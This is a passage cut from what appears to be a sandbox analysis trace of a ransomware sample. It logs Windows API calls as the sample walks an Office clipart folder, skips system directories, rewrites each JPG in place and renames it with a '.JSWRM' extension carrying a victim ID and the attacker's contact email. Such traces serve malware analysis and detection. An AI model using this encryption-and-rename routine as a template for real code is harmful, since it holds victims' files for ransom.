Office\\root\\CLIPART\\PUB60COR\\J0384895.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384895.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0090.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0090.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0090.687] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11780, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0384900.JPG", cAlternateFileName="")) returned 1 [0090.687] lstrcmpiW (lpString1="J0384900.JPG", lpString2=".") returned 1 [0090.687] lstrcmpiW (lpString1="J0384900.JPG", lpString2="..") returned 1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="...") returned 1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="windows") returned -1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="recovery") returned -1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="perflogs") returned -1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="documents and settings") returned 1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="system volume information") returned -1 [0090.688] lstrcmpiW (lpString1="J0384900.JPG", lpString2="msocache") returned -1 [0090.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384900.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384900.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384900.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384900.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0384900.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0384900.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0090.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0090.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.689] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=71552) returned 1 [0090.689] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11780) returned 0x24d210 [0090.690] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x11780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x11780, lpOverlapped=0x0) returned 1 [0090.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.697] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x11780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x11780, lpOverlapped=0x0) returned 1 [0090.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.698] CloseHandle (hObject=0x314) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0090.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0090.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0090.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0090.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0090.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0090.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0090.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0384900.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0384900.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0090.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0090.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0090.699] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x787a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0386120.JPG", cAlternateFileName="")) returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2=".") returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="..") returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="...") returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="windows") returned -1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="recovery") returned -1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="perflogs") returned -1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="documents and settings") returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="system volume information") returned -1 [0090.699] lstrcmpiW (lpString1="J0386120.JPG", lpString2="msocache") returned -1 [0090.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0090.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386120.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386120.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386120.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0090.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386120.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386120.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386120.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0090.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0090.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0090.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.700] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30842) returned 1 [0090.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7870) returned 0x24d210 [0090.701] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7870, lpOverlapped=0x0) returned 1 [0090.705] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.705] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7870, lpOverlapped=0x0) returned 1 [0090.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.706] CloseHandle (hObject=0x314) returned 1 [0090.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0090.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0090.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0090.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0090.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0090.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0090.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0090.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0090.707] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0090.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0090.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0090.707] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa91e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0386267.JPG", cAlternateFileName="")) returned 1 [0090.707] lstrcmpiW (lpString1="J0386267.JPG", lpString2=".") returned 1 [0090.707] lstrcmpiW (lpString1="J0386267.JPG", lpString2="..") returned 1 [0090.707] lstrcmpiW (lpString1="J0386267.JPG", lpString2="...") returned 1 [0090.707] lstrcmpiW (lpString1="J0386267.JPG", lpString2="windows") returned -1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="recovery") returned -1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="perflogs") returned -1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="documents and settings") returned 1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="system volume information") returned -1 [0090.708] lstrcmpiW (lpString1="J0386267.JPG", lpString2="msocache") returned -1 [0090.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386267.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386267.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386267.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0090.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386267.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386267.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0386267.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0090.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0090.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0090.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.709] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43294) returned 1 [0090.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa910) returned 0x24d210 [0090.709] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa910, lpOverlapped=0x0) returned 1 [0090.714] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.714] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa910, lpOverlapped=0x0) returned 1 [0090.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.715] CloseHandle (hObject=0x314) returned 1 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0090.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0090.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0090.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0090.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0090.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0090.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0090.715] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386267.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386267.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0090.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0090.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0090.716] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b43, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0386270.JPG", cAlternateFileName="")) returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2=".") returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="..") returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="...") returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="windows") returned -1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="recovery") returned -1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="perflogs") returned -1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="documents and settings") returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="system volume information") returned -1 [0090.716] lstrcmpiW (lpString1="J0386270.JPG", lpString2="msocache") returned -1 [0090.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0090.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0386270.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.716] WideCharToMultiByte (in: 